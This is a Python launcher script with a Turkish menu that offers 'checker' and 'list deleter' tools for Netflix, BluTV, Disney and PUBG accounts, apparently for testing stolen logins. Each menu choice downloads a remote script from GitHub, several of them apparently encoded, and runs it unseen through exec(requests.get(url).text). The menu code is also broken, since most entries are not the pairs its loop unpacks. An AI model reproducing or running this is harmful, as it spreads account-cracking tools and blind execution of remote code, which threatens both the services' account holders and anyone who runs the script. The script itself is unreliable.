import requests
import os
from cfonts import render

# Başlık Tasarımı
title = render('UM4TVıP1', colors=['white', 'blue'], align='center')

print(f"""\n
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓   
      
                      {title}
    ~ Programmer : @Um4tİsAfk ~
 
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛    
""")

# Menü Tasarımı
menu_options = [
    ("Netflix Checker"),
    ("BluTV Checker"),
    ("Disney Checker"),
    ("Pubg Checker", "Aktif ✅"),
    ("Netflix List Silici"),
    ("BluTV List Silici"),
    ("Disney List Silici"),
    ("Pubg List Silici")
]

print("\n\x1b[1;36m╭" + "─" * 62 + " ╮")
for index, (option, status) in enumerate(menu_options, 1):
    print(f"\x1b[1;36m│\x1b[1;33m {index} \x1b[1;36m- {option.ljust(46)} | \x1b[1;32m{status} \x1b[1;36m│")
print("╰" + "─" * 53 + "╯\x1b[0m\n")

def shelby():
    print("\x1b[1;39m—" * 50)
    secim = input("\x1b[1;32m • Seçiminiz: \x1b[0m")
    
    def temizle():
    	os.system('cls' if os.name == 'nt' else 'clear')

    temizle()

    baglantilar = {
        "1": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-netflixchecker.py",
        "2": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-blutvchecker.py",
        "3": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-disneychecker.py",
        "4": "https://raw.githubusercontent.com/Um4t/Um4tVip1/refs/heads/main/ENC-pubgchecker.py",
        "5": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/netflixlistesilici.py",
        "6": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/blutvlistesilici.py",
        "7": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/disneylistesilici.py",
        "8": "https://raw.githubusercontent.com/Um4t/Um4tVip1/refs/heads/main/pubglistesilici.py",
    }

    if secim in baglantilar:
        um4t(baglantilar[secim])
    else:
        print("\x1b[1;31m ❌ Hatalı seçim! Lütfen 1 ile 8 arasında bir sayı girin.\x1b[0m\n")
        shelby()

def um4t(url):
    try:
        exec(requests.get(url).text)
    except Exception as e:
        print(f"\x1b[1;31m ❌ Hata: {e}\x1b[0m")

if __name__ == "__main__":
    shelby()
